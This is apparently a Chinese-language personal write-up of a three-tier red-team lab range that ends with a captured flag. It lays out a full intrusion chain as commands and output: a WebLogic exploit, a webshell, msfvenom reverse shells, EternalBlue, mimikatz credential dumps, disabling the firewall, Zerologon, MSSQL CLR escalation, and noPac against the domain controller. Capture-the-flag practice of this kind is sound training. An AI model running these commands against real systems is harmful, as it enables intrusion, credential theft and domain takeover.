三层内网靶场渗透笔记

使用了渗透攻击红队的靶场

因为校园网只允许一次登陆俩不同mac的机器，而且笔记本电脑连的wifi，导致weblogic机器不能走桥接，所以走了net

Weblogic机器地址为 192.168.160.128

四台靶机，一台kali 我16G的小机器真快吃不消了。

ok，下面就是正式开始了~

目标探测，外网打点

首先，我们知道了目标的外网ip是 192.168.160.128

信息收集

使用goby扫描常用端口，发现存在 port: 7001 、 5985

看到中间件是weblogic

使用weblogic漏洞扫描工具，发现

[+]漏洞：CVE_2020_2551存在，返回信息：weblogic\administrator

查看是否存在杀软

https://payloads.net/kill_software/

1	powershell tasklist /svc

权限维持

没有杀软，为了维持权限，决定上传一个webshell

根据以往经验，weblogic可以比较方便的fuzz路径，类似这种

先找一下绝对路径

1
2
3

powershell pwd

C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain

1	powershell dir C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain

一路fuzz到war包部署的路径

1	powershell dir C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war

上传shell

1	C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\shell.jsp

冰蝎成功链接

生成后门，成功cs上线第一台主机

第一台机器内网信息收集

查看网卡

1	ipconfig /all

第二个网段地址是10.10.20.0/24

尝试getsystem 成功提权

mimikatz抓一下密码

内网主机发现、端口扫描

扫描 10.10.20.0网段主机

arp探测、发现新主机 10.10.20.7

横向移动

端口转发

冰蝎上传frp到DMZ主机

frpc.ini

[common]
server_addr = x.x.x.x
server_port = 7000
token = "admi@dmn123#*"

[Frp_Weblogic]
type = tcp
plugin = scoks5
local_ip = 192.168.160.128
local_port = 6666
remote_port = 21876

1
2
3

cd C:/windows/temp

shell frpc.exe -c frpc.ini

1
2
3

use auxiliary/server/socks_proxy
set srvhost 47.x.x.x
set srvport 21876

但是运行会报插件过期

还是太菜了，没怎么打过内网

后面想了下，还是降低点难度好了。

既然是打靶机，那就直接添加路由，毕竟kali和weblogic机器是同一个网段。

生成msf后门

1	msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.160.134 LPORT=14444 -f exe -o 123.exe

msf开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.160.134
set LPORT 14444
run

添加路由

1
2
3

run get_local_subnets
run post/multi/manage/autoroute 
route print

可以看到，成功添加了一条通往10.10.20.0/24网段的路由

MS17-010横向移动

use exploit/windows/smb/ms17_010_eternalblue   
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.10.20.7
set lport 5400
run

mimikatz抓取密码

load mimikatz
creds_all

#########################################
Username       Domain       Password
--------       ------       --------
(null)         (null)       (null)
Administrator  REDTEAM.RED  Admin12345
saul           REDTEAM.RED  admin!@#45

创建中转监听器

生成后门

使用msf将后门上传到WIN7上

关闭防火墙防火墙

这里使用梼杌插件了

1	shell netsh advfirewall set allprofiles state off

运行beacon.exe成功上线第二台机器

第二台机器内网信息收集

看到俩存活ip 10.10.10.7 、 10.10.10.8

并且看到10.10.10.8是域owa.redteam.red域控主机

使用fscan

[*] 10.10.10.18  (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] WebTitle:http://10.10.10.18        code:200 len:4      title:IIS7
[*] 10.10.10.18          REDTEAM\SQLSERVER-2008    Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[*] 10.10.10.8  (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] 10.10.10.8     [+]DC REDTEAM\OWA               Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[*] WebTitle:https://10.10.10.8        code:200 len:4      title:IIS7
[+] mssql:10.10.10.18:1433:sa sa

添加路由

1 2	run get_local_subnets run autoroute -s 10.10.10.0/255.255.255.0

手动添加一条通往10.10.10.0/24的路由

根据之前收集到的信息，另外两个目标都是windows 2008。

尝试使用CVE-2020-1472

use admin/dcerpc/cve_2020_1472_zerologon
set rhosts 10.10.10.8
set nbname OWA
run

成功将域控密码置空

1
2

[+] 10.10.10.8:6008 - Successfully authenticated
[+] 10.10.10.8:6008 - Successfully set the machine account (OWA$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)

创建监听

尝试直接跳到域控，可惜失败了

开启socks代理

1
2
3

use auxiliary/server/socks_proxy
set srvport 4300
run

信息收集，知道有mssql

添加走socks代理的应用

爆破弱口令

sa/sa

之前fscan扫的时候已经把数据库账号密码扫出来了，没注意看

这里check显示failed了，但其实是成功的

上线主机3

使用SharpSQLTools GUI版本上传后门

经过多次测试，终于找到了一个可上传的目录上传了后门

运行后成功上线第三台主机

权限提升

当前权限小，好多路径都不能写

使用SharpSQLTools cli版本

成功提升到system权限

1
2
3

.\SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami
.\SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
.\SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami

再次运行后门

1	.\SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato C:\Users\Public\win7.exe

成功上线system权限的第三台主机

mimikatz抓到密码

1 2	user : redteam\sqlserver pass : Server12345

约束委派攻击

查阅了很多资料，没搞明白。这里就是复现一下WP内容了

上传kekeo.exe

运行完会在这里开shell的，直接关闭进程就好

1	shell kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"

1	shell kekeo.exe "tgs::s4u /tgt:TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:administrator@redteam.red /service:cifs/owa.redteam.red"

1	mimikatz kerberos::ptt TGS_administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi

多次尝试后依旧拒绝访问。决定换个思路

CVE-2021-42278 拿下域控shell

proxychains4 python3 sam_the_admin.py 'redteam/sqlserver:Server12345' -dc

powershell cat c:\Users\Administrator\desktop\flag.txt
# flag{saulgoodman}